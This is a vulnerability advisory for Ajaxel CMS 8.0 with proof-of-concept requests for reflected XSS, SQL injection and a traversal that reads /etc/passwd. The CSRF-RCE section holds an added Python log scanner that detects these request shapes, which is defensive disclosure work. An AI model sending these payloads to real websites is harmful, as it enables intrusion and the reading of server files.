Ajaxel CMS 8.0 Multiple Vulnerabilities

Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below

Summary: Ajaxel CMS is a very simple ajaxified CMS and framework
for any project needs.

Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities including LFI, XSS, SQL injection and remote
code execution via CSRF.

Tested on: Apache 2.4.10
           MySQL 5.5.46

Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
                            - [dizzyduck_at_zeroscience.mk]

Advisory ID: ZSL-2016-5320
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5320.php

13.04.2016

--

1. Reflected XSS:
-----------------

GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5

HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200, USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/', REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0, URL_KEY_ADMIN:'cms',...

2. SQL Injection:
-----------------

http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=

3. Local File Disclosure:
-------------------------

http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd

4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------
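
Added example, not part of the original advisory or its PoC code: a Python check that scans web-server access logs for the request shapes shown in sections 1 and 3 (a quote in the path that is echoed into Conf.REFERER, and traversal in the templates popup file parameters). The log lines, the Apache-style log format, the parameter set and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines; the targets in entries 2 and 3 copy sections 1 and 3.
SAMPLE_LOG = [
    '10.0.0.7 - - [13/Apr/2016:10:00:01 +0000] "GET /cms=mods/tab=ai HTTP/1.1" 200 5120',
    '10.0.0.9 - - [13/Apr/2016:10:00:05 +0000] "GET /cmsj9bwp\'-alert(1)-\'xvjry=mods/ HTTP/1.1" 404 2210',
    '10.0.0.9 - - [13/Apr/2016:10:00:09 +0000] "GET /?window&cms=templates&popup=1'
    '&file_folder=cms&folder=&file=../../../../etc/passwd HTTP/1.1" 200 1432',
    '10.0.0.9 - - [13/Apr/2016:10:00:12 +0000] "GET /?window&cms=templates&popup=1'
    '&file_folder=cms&folder=&file=..%2F..%2Fconfig.php HTTP/1.1" 200 911',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FILE_PARAMS = {"file", "folder", "file_folder"}  # parameters seen in section 3

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are normalised before matching."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(target):
    """Return the findings for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    # Section 1: the path lands in the single-quoted Conf.REFERER JavaScript string.
    if re.search(r"['\"<>\\\r\n]", fully_decode(parts.path)):
        findings.append("js-string-breakout-in-path")
    # Section 3: file parameters must never hold ".." segments or absolute paths.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        path = fully_decode(value).replace("\\", "/")
        if name in FILE_PARAMS and (".." in path.split("/") or path.startswith("/")):
            findings.append("path-traversal-in-" + name)
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line that matches a pattern."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

The same two conditions can serve as server-side input checks until a fixed release is installed: reject paths containing quote characters before they are written into the page, and reject file parameters that contain `..` segments.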